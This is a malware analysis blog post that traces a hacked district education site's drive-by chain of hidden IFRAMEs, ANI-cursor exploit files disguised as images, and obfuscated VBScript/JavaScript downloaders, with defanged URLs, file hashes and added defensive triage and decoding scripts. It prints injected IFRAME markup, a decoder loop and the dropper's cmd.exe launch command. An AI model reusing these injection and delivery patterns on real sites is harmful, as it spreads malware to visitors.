A certain city's Hexi District Education Information Network has been "upgraded" into a demonstration platform for successive generations of Trojan delivery techniques


Endurer original, version 1

This site was previously found injected with code spreading Worm.Win32.Viking.jr and others. For details see:

A certain Hexi District Education Information Network injected with code spreading Worm.Win32.Viking.jr and others
Http://endurer.bokee.com/6186405.html
Http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
Http://blog.sina.com.cn/u/49926d910100082w

Revisiting it just now, I found it has been "upgraded" into a walk through the history of Trojan delivery techniques: from simple tricks such as padding the code with redundant spaces and hiding it behind escape(), up to US-ASCII encoding and the ANI vulnerability (the animated-cursor bug patched by MS07-017).

Code found at the end of the home page:
/---
<IFRAME src="hxxp://W***.Q**B*B**d.com/bd?##.htm?001" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src="hxxp://www.M***M*ju.net/bbs/tj?##.htm" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src="hxxp://IDC**.ki*s***163.com/index.html?Id=hagk" width="0" height="0"></IFRAME>
<IFRAME src=hxxp://www.hao123***hao123*.CN/OK***/index.htm width=0 height=0></IFRAME>
<IFRAME src=hxxp://www.X**4*5*4**.CN/ width=100 height=0 frameborder=0></IFRAME>
<IFRAME src=hxxp://www.X**4*5*4**.CN/ width=100 height=0 frameborder=0></IFRAME>
<IFRAME src=hxxp://www.X**4*5*4**.CN/ width=100 height=0 frameborder=0></IFRAME>
<IFRAME src=hxxp://QQ***.H*1***48.cn/ width=100 height=0 frameborder=0></IFRAME>
---/

hxxp://W***.Q**B*B**d.com/bd?##.htm?001 contains:
/---
<BODY style='cursor: URL(hxxp://s***.g*C***uj.com/t.js)'>

<IFRAME src="hxxp://s***.g*C***uj.com/1.htm" width="0" height="0" frameborder="0"></IFRAME>
---/

t.js is loaded as a cursor, so despite the name it is an ANI file; it exploits the ANI vulnerability to download 0.exe.
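The two delivery patterns above, invisible IFRAMEs and a cursor: url() that points at something other than a cursor file, recur on every page in this chain (t.js here, 1.jpg, 2.jpg, a.jpg, b.jpg, d.jpg and xjz2007.bmp further down). The following is an added example, not code from the original post or from any of the sites described, that triages a captured page for both patterns offline. The sample HTML and its .invalid host names are constructed for the demonstration.

```javascript
// Added example (not from the original post): static triage of a captured
// HTML page for invisible IFRAMEs and for "cursor: url(...)" references whose
// target is not a .cur/.ani file, the way the ANI exploit was served here.
// SAMPLE_HTML and the *.example.invalid hosts are constructed for the demo.

const SAMPLE_HTML = `
<IFRAME src="http://stage1.example.invalid/bd.htm?001" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src=http://stage2.example.invalid/index.htm width=100 height=0 frameborder=0></IFRAME>
<IFRAME src="http://video.example.invalid/player.htm" width="640" height="360"></IFRAME>
<BODY style='cursor: URL(http://stage3.example.invalid/t.js)'>
<DIV style="cursor: url('http://stage3.example.invalid/arp/1.jpg')"></DIV>
<DIV style="cursor: url('/static/hand.cur')"></DIV>
`;

// Pull name=value attributes out of one tag, quoted or unquoted.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// An IFRAME that cannot be seen has no legitimate reason to load a remote page.
function findHiddenIframes(html) {
  const found = [];
  const re = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const a = parseAttrs(m[0]);
    const w = parseInt(a.width ?? '', 10);
    const h = parseInt(a.height ?? '', 10);
    if ((w === 0 || h === 0) && a.src) {
      found.push({ src: a.src, width: a.width, height: a.height });
    }
  }
  return found;
}

// cursor: url(...) legitimately points at .cur or .ani files. Anything else
// (t.js, 1.jpg, xjz2007.bmp in the post) is a renamed ANI file.
function findSuspiciousCursors(html) {
  const found = [];
  const re = /cursor\s*:\s*url\(\s*['"]?([^'")\s]+)['"]?\s*\)/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const url = m[1];
    const path = url.split(/[?#]/)[0];
    const ext = (path.match(/\.([a-z0-9]+)$/i) || ['', ''])[1].toLowerCase();
    if (ext !== 'cur' && ext !== 'ani') found.push({ url, ext });
  }
  return found;
}

function triage(html) {
  return {
    hiddenIframes: findHiddenIframes(html),
    suspiciousCursors: findSuspiciousCursors(html),
  };
}

console.log(JSON.stringify(triage(SAMPLE_HTML), null, 2));
```

Run against the constructed sample it reports the two zero-sized IFRAMEs and the two cursor URLs ending in .js and .jpg, and ignores the visible player frame and the genuine .cur file. Because it never evaluates the page, it is safe to run over captured HTML before any decoding step.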

File: D:/test/0.exe
Attributes: ---
Version information: could not be read
Created:
Modified: 12:55:52
Accessed: 12:56:53
Size: 36864 bytes (36.0 KB)
MD5: 03e68c72bb560cd19711afdebd63c73c

Kaspersky reports it as Worm.Win32.Delf.bs.

Hxxp: // s ***. g ** C *** uj.com/1.htmThe content is JavaScript code. The function is to use Unescape () to calculate the value of the variable words and output it.

The decoded words is VBScript that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download 0.exe, saves it as install.com in the IE temporary folder, and runs it through the ShellExecute method of a Shell.Application object.

hxxp://s***.g**C***uj.com/bd.htm?001 is identical to hxxp://W***.Q***B**d.com/bd?##.htm?001.

hxxp://IDC**.Ki**s**163.com/index.html?Id=hagk contains:
/---
<SCRIPT src=css.js></SCRIPT>
---/

hxxp://IDC**.Ki**s**163.com/css.js is JavaScript that decodes its payload with a custom function and runs the result through eval().

The decoded payload is JavaScript that downloads hxxp://Bo*ol***o*m.com/love.exe using Microsoft.XMLHTTP and Scripting.FileSystemObject. See:

Beware of a website offering free 6-digit QQ numbers that spreads Worm.Win32.Viking.lj / Worm.Viking.sv
Http://endurer.bokee.com/6274049.html
Http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
Http://blog.sina.com.cn/u/49926d91010008pd

hxxp://www.hao123***hao123*.CN/OK***/index.htm contains:
/---
<IFRAME src="hxxp://www.hao123***hao123*.CN/BBS/1881.htm" width="0" height="0" frameborder="0"></IFRAME>
---/

hxxp://www.hao123***hao123*.CN/BBS/1881.htm contains:
/---
<IFRAME src="hxxp://www.f*z***zv.com/sousuo.htm" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src="hxxp://www.955***92***2.cn/web.htm" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src="hxxp://www.hao123***hao123*.CN/" width="0" height="0" frameborder="0"></IFRAME>
<IFRAME src="hxxp://www.I***P***5*28.cn/" width="0" height="0" frameborder="0"></IFRAME>
---/

hxxp://www.f*z***zv.com/sousuo.htm contains:
/---
<IFRAME src="hxxp://s***.g**C***uj.com/bd.htm?268001" width="0" height="0" frameborder="0"></IFRAME>
---/

hxxp://s***.g**C***uj.com/bd.htm?268001 has the same content as hxxp://W***.Q***B**d.com/bd?##.htm?001.

hxxp://www.955***92***2.cn/web.htm contains:
/---
<IFRAME src=hxxp://www.1*****8d***M*m***.com/dm/kehu0738.htm width=0 height=0></IFRAME>
---/

hxxp://www.1*****8d***M***.com/dm/kehu0738.htm contains a string in "US-ASCII" encoding. IE renders a page declared as charset=US-ASCII as 7-bit and ignores the high bit of every byte, so markup written with the high bit set (for example 0xBC in place of 0x3C, '<') displays normally but is invisible to filters that look for the plain characters. Decoding it with the US-ASCII encoder/decoder downloadable from http://purpleendurer.ys168.com gives:
/---
<HTML>
<BODY>
<DIV id=new_content_jp style="display: none">
<DIV style="cursor: URL('hxxp://1*****8d***M**M***.com/arp/1.jpg')">
<DIV style="cursor: URL('hxxp://1*****8d**M***.COM/arp/2.jpg')"></DIV>
<SCRIPT language=JavaScript src="hxxp://1*****8d***M**M***.com/arp/run.js"></SCRIPT>
</BODY>
<IFRAME src=hxxp://www.1*****8d***M*m***.com/arp/0614.htm width=0 height=0></IFRAME>
</HTML>
---/

1.jpg and 2.jpg are ANI files despite the extension; they exploit the ANI vulnerability to download down.exe.

File: D:/test/down.exe
Attributes: ---
Version information: could not be read
Created: 13:15:51
Modified: 13:17:39
Accessed: 13:18:17
Size: 18944 bytes (18.5 KB)
MD5: c23c3fabe68fdadd14a89bf111f8bf2e

Kaspersky reports it as Trojan-Downloader.Win32.Delf.bko.

hxxp://1*8d*m*.com/arp/run.js detects the browser type and version and writes out the code that loads 1.jpg and 2.jpg.

hxxp://www.1*****8d**M*m***.com/arp/0614.htm contains JavaScript and VBScript. The VBScript decoder loop:
/---
Do While Len(s) > 1
    k = "&H" + UCase(Left(s, 2))   ' next two hex digits as a VBScript hex literal
    p = CLng(k)                    ' hex literal -> number
    m = Chr(p)                     ' number -> character
    d = d & m                      ' append to the decoded output
    s = mymid(s)                   ' custom helper elsewhere in the script, presumably drops the consumed pair
Loop
---/
This loop decodes the value of the variable s two hex digits at a time and outputs the result as VBScript, JavaScript or HTML depending on the variable flag_type. Here flag_type is "vbs", so the output is VBScript that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download down.exe into the IE temporary folder, creates down.vbs, and runs it through the ShellExecute method of a Shell.Application object.
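Three obfuscation layers appear in this chain: the unescape() wrapper in 1.htm, the US-ASCII high-bit trick in kehu0738.htm, and the hex-pair loop just shown. Each can be undone offline without letting any of the script execute. The following is an added example written for this page, not code from the post or from the pages it describes; the encoder helpers and the VBScript-like fragment they wrap exist only to construct the sample input, and the indicator list is my own choice of the ProgIDs every decoded stage in the post ends up calling.

```javascript
// Added example (not the post's or the attackers' code): offline decoding of
// the three obfuscation layers seen in this chain, so a payload can be read
// without running it in a browser. All sample inputs are constructed.

// 1) escape()/unescape() layer: decode %XX and %uXXXX sequences ourselves
//    instead of letting unescape() feed document.write().
function decodePercent(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (_, u, b) =>
    String.fromCharCode(parseInt(u ?? b, 16)));
}

// 2) "US-ASCII" layer: IE treated a page declared as charset=US-ASCII as
//    7-bit, so a byte like 0xBC (0x3C | 0x80) rendered as '<' while a filter
//    looking for '<' saw nothing. Clearing bit 7 of every byte undoes it.
function decodeUsAscii(bytes) {
  return String.fromCharCode(...Array.from(bytes, b => b & 0x7f));
}

// 3) Hex-pair layer, the JavaScript equivalent of the VBScript loop above
//    (k = "&H" + Left(s, 2) : Chr(CLng(k)) : s = the rest of s).
function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Encoder helpers, used only to build the constructed samples below.
const toHex = s => Array.from(s, c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const toUsAscii = s => Uint8Array.from(s, c => c.charCodeAt(0) | 0x80);

// ActiveX ProgIDs that the decoded stages in the post rely on (my own list).
const DOWNLOADER_INDICATORS = [
  'Microsoft.XMLHTTP', 'ADODB.Stream', 'Scripting.FileSystemObject',
  'Shell.Application', 'ShellExecute',
];
function downloaderIndicators(script) {
  const lower = script.toLowerCase();
  return DOWNLOADER_INDICATORS.filter(ind => lower.includes(ind.toLowerCase()));
}

// Constructed stand-in for a decoded VBScript dropper: a fragment naming the
// objects, not a working downloader.
const SAMPLE_VBS = 'Set x = CreateObject("Microsoft.XMLHTTP")\r\n' +
  'Set fso = CreateObject("Scripting.FileSystemObject")\r\n' +
  'Set sh = CreateObject("Shell.Application")\r\n' +
  'sh.ShellExecute path, "", "", "open", 0';

// Constructed stand-in for the kehu0738.htm wrapper: the hex layer inside a
// US-ASCII-encoded <script> block.
const SAMPLE_HEX = toHex(SAMPLE_VBS);
const SAMPLE_US_ASCII = toUsAscii('<script>var s="' + SAMPLE_HEX + '";</script>');

// Peel the constructed sample: US-ASCII, then the hex string inside it.
function peelSample() {
  const html = decodeUsAscii(SAMPLE_US_ASCII);        // layer 2
  const hex = html.match(/var s="([0-9a-f]+)"/i)[1];  // pull out the payload
  const vbs = decodeHexPairs(hex);                    // layer 3
  return { vbs, indicators: downloaderIndicators(vbs) };
}

console.log(peelSample());
```

The point of decoding rather than executing is that the final stage is VBScript destined for the ActiveX downloader objects; once it is plain text, the presence of Microsoft.XMLHTTP, Scripting.FileSystemObject and Shell.Application.ShellExecute together is itself the verdict, regardless of which of the three wrappers the author chose.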

hxxp://www.hao123***hao123*.CN/ contains:
/---
<IFRAME src=hxxp://www.S*en***love.com/a?#/2.htm width=50 height=0></IFRAME>
---/

hxxp://www.S*en***love.com/a?#/2.htm contains:
/---
<DIV style="cursor: URL('hxxp://www.S*en***love.com/a?#/a.jpg')">
<DIV style="cursor: URL('hxxp://www.S*en***love.com/a?#/b.jpg')"></DIV></BODY><IFRAME src=v1.htm width=0 height=0></IFRAME>
---/
a.jpg and b.jpg are again ANI files that exploit the ANI vulnerability to download hxxp://www.S*en***love.com/a?#/2.exe

File: D:/test/2.exe
Attributes: ---
Version information: could not be read
Created: 13:23:35
Modified: 13:24:28
Accessed:
Size: 23030 bytes (22.5 KB)
MD5: b43b5493549c4f7658850bdbe41e8c4f

Kaspersky reports it as Trojan-PSW.Win32.Delf.qc.

hxxp://www.S*en***love.com/a?#/v1.htm contains:
/---
<SCRIPT src=1.js></SCRIPT>
---/

1.js could not be opened; it may no longer exist.

hxxp://www.I***P***5*28.cn/ contains:
/---
<IFRAME src=hxxp://www.08*****3*****25.cn/wm/xin4?##.htm?110 width=0 height=0></IFRAME>
---/

hxxp://www.08***3***25.cn/wm/xin4?##.htm?110 contains:
/---
<BODY style='cursor: URL(hxxp://www.08*****3*****25.cn/wm/d.jpg)'></BODY>
</HTML>
<SCRIPT src=hxxp://www.08*****3*****25.cn/wm/0614.js></SCRIPT>
---/

d.jpg exploits the ANI vulnerability to download hxxp://www.08*****3*****25.cn/wm/down.exe

File: D:/test/down.exe
Attributes: ---
Version information: could not be read
Created: 13:42:49
Modified: 13:43:54
Accessed: 13:44:42
Size: 16619 bytes (16.2 KB)
MD5: a961822d4e5d96a4f2e58be91f83a450

Kaspersky reports Trojan-Downloader.Win32.Delf.bko and Worm.Win32.Delf.bs.

hxxp://www.08*****3*****25.cn/wm/0614.js is JavaScript that decodes its payload with a custom function and runs the result through eval().

The decoded payload is JavaScript that downloads down.exe using Microsoft.XMLHTTP and Scripting.FileSystemObject and saves it under %WINDIR%. The file name comes from the function:
/---
function Gn(n) { var number = Math.random() * n; return '~TMP' + '.tmp'; }  // number is computed but never used
---/
which always yields ~TMP.tmp. The file is then launched through the ShellExecute method of a Shell.Application object with the command %WINDIR%\system32\cmd.exe /C %WINDIR%\~TMP.tmp. Going through cmd.exe /C lets the dropped PE run even though its extension is .tmp rather than .exe, which also keeps it clear of anything that only watches for new .exe files.
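That launch is the one part of this chain that leaves a trace on the host rather than in the browser, so it is worth a detection. The following is an added example, not code from the post: a small command-line triage that flags cmd.exe /C (or /K) being used to start a file whose extension is not an executable one. The command lines are constructed, and EXEC_EXTS mirrors the default PATHEXT list; it is a heuristic, so it treats a bare command name (no extension) as normal PATHEXT resolution and leaves it alone.

```javascript
// Added example (not from the post): flag the launch pattern the decoded
// 0614.js ends with, namely cmd.exe /C running a file whose extension is not
// an executable one. A PE saved as %WINDIR%\~TMP.tmp still runs this way.
// The sample command lines are constructed; EXEC_EXTS mirrors default PATHEXT.

const EXEC_EXTS = new Set(['com', 'exe', 'bat', 'cmd', 'vbs', 'vbe', 'js', 'jse', 'wsf', 'wsh', 'msc']);

// Split a Windows command line into argv, honouring double quotes.
function splitCmdline(cmdline) {
  const args = [];
  const re = /"([^"]*)"|(\S+)/g;
  let m;
  while ((m = re.exec(cmdline)) !== null) args.push(m[1] ?? m[2]);
  return args;
}

// Lower-cased extension of the last path component, '' if there is none.
function extensionOf(path) {
  const base = path.split(/[\\/]/).pop();
  const dot = base.lastIndexOf('.');
  return dot >= 0 ? base.slice(dot + 1).toLowerCase() : '';
}

// Returns a finding when cmd.exe /C or /K launches a file with a
// non-executable extension, null otherwise.
function flagOddExtensionLaunch(cmdline) {
  const argv = splitCmdline(cmdline);
  if (argv.length < 3) return null;
  const image = argv[0].split(/[\\/]/).pop().toLowerCase();
  const sw = argv[1].toLowerCase();
  if (image !== 'cmd.exe' || (sw !== '/c' && sw !== '/k')) return null;
  const target = argv[2];
  const ext = extensionOf(target);
  if (ext === '') return null;            // bare name: normal PATHEXT lookup
  if (EXEC_EXTS.has(ext)) return null;    // ordinary executable or script
  return { target, ext, reason: 'cmd.exe /C launching a file with a non-executable extension' };
}

// Constructed process command lines: the dropper's launch, an admin running
// ipconfig, and a plain shell builtin.
const SAMPLE_CMDLINES = [
  'C:\\WINDOWS\\system32\\cmd.exe /C C:\\WINDOWS\\~TMP.tmp',
  'C:\\WINDOWS\\system32\\cmd.exe /C C:\\WINDOWS\\system32\\ipconfig.exe /all',
  '"C:\\Windows\\System32\\cmd.exe" /c dir',
];

function triageAll(lines) {
  return lines.map(l => ({ cmdline: l, finding: flagOddExtensionLaunch(l) }));
}

console.log(JSON.stringify(triageAll(SAMPLE_CMDLINES), null, 2));
```

Only the first sample is flagged. In a real pipeline the same check would be fed from process-creation telemetry, where the parent being iexplore.exe (via ShellExecute from script) makes the finding far stronger than the extension alone.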

hxxp://www.x**4*5*4**.CN/ contains:
/---
<IFRAME src="hxxp://qq.5**20s**f.org/44251#/index.htm" width="100" height="0"></IFRAME>
<IFRAME src=hxxp://qq.5**20s**f.org/44251366#/06014.htm width=0 height=0></IFRAME>
<IFRAME src="hxxp://www.5***4***6***0379cn/index.htm" width="100" height="0"></IFRAME>
<IFRAME src="hxxp://www.m***HK***j52***0.com/index.htm" width="100" height="0"></IFRAME>
---/

hxxp://qq.5**20s**f.org/43661366#/index.htm contains:
/---
<SCRIPT src="hxxp://qq.5**20s**f.org/44251379/xjz2007.js"></SCRIPT>
---/

hxxp://qq.5**20s**f.org/43661366#/xjz2007.js contains:
/---
document.writeln("<IFRAME src=xjz2007.htm width=0 height=0 frameborder=0><\/IFRAME>");
document.writeln("<DIV style=\"cursor: URL(\'xjz2007.bmp\')\">");
document.writeln("</DIV></BODY>");
---/

hxxp://qq.5**20s**f.org/410811080000/xjz2007.htm contains VBScript, but it needs no decoding: the value of the variable xinchunkuaile already shows that the downloaded file is 6xz.exe.

File: D:/test/6xz.exe
Attributes: ---
Version information: could not be read
Created:
Modified:
Accessed: 13:45:23
Size: 22528 bytes (22.0 KB)
MD5: 410da0576768619b234adbda5ba06bc5

Kaspersky reports it as Downloader.Win32.Small.eor.

xjz2007.bmp is an ANI file despite its name; it exploits the ANI vulnerability to download 6xz.exe.

hxxp://qq.5**20s**f.org/410811080000/06014.htm is padded with many spaces. Its JavaScript uses ADODB.Stream, Microsoft.XMLHTTP and Scripting.FileSystemObject to download 6xz.exe, saves it as ie.exe, creates ie.vbs, and runs it through the ShellExecute method of a Shell.Application object. It also contains a custom function named exploit().

hxxp://www.5**4*6**0133cn/index.htm contains:
/---
<IFRAME src="hxxp://www.P***um***a163***.com/P***U/709671697.htm?56" width="0" height="0" frameborder="0"></IFRAME>
S"></SCRIPT>
---/

hxxp://www.P***um***a163***.com/P***U/709671697.htm?56 contains:
/---
<SCRIPT src=614.js></SCRIPT>
---/

hxxp://www.P***um***a163***.com/P***U/614.js has the same content as the script described in

Beware of a website offering free 6-digit QQ numbers that spreads Worm.Win32.Viking.lj / Worm.Viking.sv
Http://endurer.bokee.com/6274049.html
Http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
Http://blog.sina.com.cn/u/49926d91010008pd

and downloads pu.exe.

hxxp://www.m***HK***j52***0.com/index.htm contains:
/---
<IFRAME src=hxxp://www.08*****3*****25.cn/wm/xin16.htm width=0 height=0></IFRAME>
---/

hxxp://www.08*****3*****25.cn/wm/xin16.htm has the same content as hxxp://www.08*****3*****25.cn/wm/xin4?#.htm?110.

hxxp://QQ*****.h**1*****48.cn/ could not be opened.

 
